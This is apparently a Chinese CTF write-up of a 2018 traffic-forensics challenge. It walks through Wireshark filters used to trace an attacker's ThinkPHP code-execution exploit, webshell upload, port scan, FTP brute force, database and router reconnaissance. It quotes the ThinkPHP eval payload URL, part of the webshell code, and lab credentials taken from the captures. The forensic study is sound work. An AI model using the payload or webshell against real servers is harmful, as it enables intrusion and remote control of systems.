【CTF-MISC】2018西普杯铁人三项数据赛

上周参加了西普杯铁人三项
大致记录一下数据赛流量分析的过程

0x01 基本信息

攻击者IP

首先Wireshark分析第一个数据包：
可以看到数据太多：
先http协议过滤一下，以便了解大致过程
很多无用的正常包
很显然看到202.1.1.2对192.168.1.99的请求有些异常
直接进行过滤：

http and ip.addr==202.1.1.2
or
http and ip.src==202.1.1.2

HTTP

很显然攻击者利用thinkPHP框架下的任意代码执行漏洞
攻击者：
IP：202.1.1.2

0x02 Webshell相关

服务器拿到的webshell的网址
网站根目录的绝对路径
攻击者上传的第一个文件名称是什么

服务器拿到的webshell的网址

从上面的攻击者的代码执行过程可以看到服务器拿到webshell的网址：

http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}

网站根目录的绝对路径

接下来看一下攻击者执行的代码，base64解码后，发现其查询了phpinfo并写入了webshell：
追踪http流提取出phpinfo(保存成html文件后打开即可)：

图片.png

即可在phpinfo中即可看到网站根目录：
/var/www/html/easytalk

攻击者上传的第一个文件

追踪后面的http流并解码base64即可看到：
上传的第一个文件：scan.php
同时，可以看到其写入的webshell：

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i


分别从数据包中提取出z2以十六进制保存文件即可看到写入文件的具体信息，但好像比赛过程只用到了前面的scan.php:









scan.php


0x03 服务器信息

对方1.99服务器的cms种类及版本号
1.99服务器的主机名
扫描内网端口的端口范围

1.99的cms信息：
过滤：
http and ip.addr==192.168.1.99

查找返回信息中与其cms相关的信息：
 其实从上面的写入的文件路径可以看出应该是easytalk
 直接在过滤后搜索分组字节流的字符串就可以找到：
 最后在第二个数据包中找到了答案：









easytalk


主机名：
因为上面提取过phpinfo，打开即有主机名信息：
 







phpinfo



 主机名：
simplefight1

端口扫描范围：
从scan.php的内容可以看出攻击者利用上传的scan.php来进行扫描
 直接搜索列表信息字符串scan.php
 追踪http流即可看到扫描端口范围(其实有两个，当时没仔细分析，毕竟有五次作答机会，最多两次就试出来了)：









1











2


0x03 FTP相关

服务器2.88的ftp服务账号密码
黑客成功登陆ftp的时间
攻击者通过ftp协议下载的敏感文件及路径

ftp服务账号密码以及黑客成功登陆ftp的时间
在第二个数据包中
 过滤ftp协议，发现攻击者不断尝试登陆建立ftp连接：
 







ftp



 找到第一次成功建立连接的地方：









success



 看到这里的用户名及密码：
administrator/123456

 并在数据包中看到其成功登录的时间：









time



 攻击者成功登陆时间：
14:07:15

攻击者通过ftp协议下载的敏感文件及路径
接下来直接过滤ftp协议即可看到攻击者不断猜解路径
 并且最后找到：
 /phpStudy/WWW/config/config_db.php
0x04 数据库相关

服务器2.88中用户名为admin_zz的web后台管理员的密码
服务器上数据库的用户名密码
攻击者查看的一些表的信息以及其设置的genreal log的绝对路径

admin_zz管理员的密码
(这题与数据库无关，只是按顺序夹在ftp和数据库之间，不知道往哪里放)
 过滤：
http && ip.addr == 192.168.1.99 

在分组详情中查找:admin_zz
 在第三个数据包中发现：
 







admin_zz




admin_zz的密码为：1q2w3e4r

数据库的用户名密码
下面查看config_db.php的内容：
 过滤协议：
ftp-data

在其中一个流量包中发现了config_db.php:
 查看数据库配置配置信息：
 







config_db.php



 可以看到数据库的用户名和密码：


localhost/S1mp13zz

 其实也可以通过第四个数据包过滤mysql协议通过查看query语句找到相关信息，不过这里的密码是加密过的，无法获取信息：









mysql



攻击者查看的一些表的信息以及其设置的genreal log的绝对路径
这些信息询问的数据库、表以及设置genreal log的绝对路径等信息可以直接从过滤mysql后的这些数据包中的sql查询语句中得到，不再细说
0x05 路由器相关

路由器的品牌、型号、版本
路由器的所有IP地址
路由器的端口监控中的监控端口和被监控端口
路由器接口个数以及WAN口和LAN口个数
路由器的系统路由表的条数以及第三条的子网掩码
路由器的5Gwif名称和信道

路由器的品牌、型号、版本
过滤一下本地局域网（路由器常用界面）：
http && ip.addr == 192.168.0.1

在第一个数据包中看到了答案：
 







路由器



 可以看到路由器及其版本号为：
TL-WAR1300L v1.0

路由器的所有IP地址
猜测接下来攻击者会获取路由信息
 所以追踪后面的几条http流
 发现几条数据：
{
    "id": 1,
    "result": {
        "normal": [{
            "py_isup": false,
            "ipaddr": "",
            "t_type": "ethernet",
            "t_isup": "disconnect",
            "t_name": "WAN1",
            "t_linktype": "dhcp"
        },{
            "py_isup": false,
            "ipaddr": "",
            "t_type": "ethernet",
            "t_isup": "disconnect",
            "t_name": "WAN2",
            "t_linktype": "dhcp"
        },{
            "py_isup": false,
            "ipaddr": "",
            "dhcp_status": "on",
            "t_type": "ethernet",
            "t_name": "LAN1",
            "t_isup": "disconnect",
            "t_linktype": "static"
        }, {
            "py_isup": false,
            "ipaddr": "",
            "dhcp_status": "on",
            "t_type": "ethernet",
            "t_name": "LAN2",
            "t_isup": "disconnect",
            "t_linktype": "static"
        }, {
            "py_isup": false,
            "ipaddr": "",
            "dhcp_status": "on",
            "t_type": "ethernet",
            "t_name": "LAN3",
            "t_isup": "disconnect",
            "t_linktype": "static"
        }]
    },
    "error_code": "0"
}

可以看到这里有5个端口，WAN1，WAN2，LAN1，LAN2，LAN3都是关闭状态
 继续追踪http流：
 发现：
{
"id":1,
"result":{
    "normal":[
        {
            "py_isup":true,
            "ipaddr":"202.1.1.1",
            "t_type":"ethernet",
            "t_isup":"connect",
            "t_name":"WAN1",
            "t_linktype":"static" 
    },
        {
            "py_isup":true,
            "ipaddr":"192.168.12.173",
            "t_type":"ethernet",
            "t_isup":"internet",
            "t_name":"WAN2",
            "t_linktype":"dhcp" 
    },
        {
            "py_isup":true,
            "ipaddr":"192.168.0.1",
            "dhcp_status":"on",
            "t_type":"ethernet",
            "t_name":"LAN1",
            "t_isup":"connect",
            "t_linktype":"static" 
    },
        {
            "py_isup":true,
            "ipaddr":"192.168.0.1",
            "dhcp_status":"on",
            "t_type":"ethernet",
            "t_name":"LAN2",
            "t_isup":"connect",
            "t_linktype":"static" 
    },
        {
            "py_isup":false,
            "ipaddr":"192.168.0.1",
            "dhcp_status":"on",
            "t_type":"ethernet",
            "t_name":"LAN3",
            "t_isup":"disconnect",
            "t_linktype":"static" 
    } 
] 
},
"error_code":"0" 
}

这里就是路由器所有IP地址：
 192.168.0.1,192.168.12.173,202.1.1.1
路由器的端口监控中的监控端口和被监控端口
过滤
http contains "port" && ip.addr == 192.168.0.1

发现一条记录：
 







port



 不太懂这个数据，不过从json数据的英文可以看出：


应该是3号端口监控1,2端口

路由器接口个数以及WAN口和LAN口个数：
从上面第二次追踪的数据中可以看出，路由器最终有5个接口，并且开启了WAN1，WAN2，LAN1，LAN2
 所以共有5个接口，其中2个WAN启用，两个LAN启用
路由器的系统路由表的条数以及第三条的子网掩码：
过滤协议：
ip.addr == 192.168.0.1 && http 

而后在分组详情中中查找"gateway"
 或者直接过滤：
http contains "gateway" && ip.addr==192.168.0.1

查找后看到一条数据：
 







gateway



 很显然：


一共5条数据，且第三条的子网掩码为:255.255.252.0

路由器的5Gwif名称和信道:
直接查找与信道相关的http流
 与查找"gateway"方法相同
 分组详情查找"5G"(区分大小写)，或者"channel"（信道）
 在查找"5G"时发现：
 







5G



 可以看到:
5Gwif名称为test-ge1，信道为：36

0x06 END
最后总成绩不错，决赛加油吧
 附上比赛数据包:
https://drive.google.com/open?id=15GEJRUFv8WdxFCIvuuuOMAp8no8X7gjt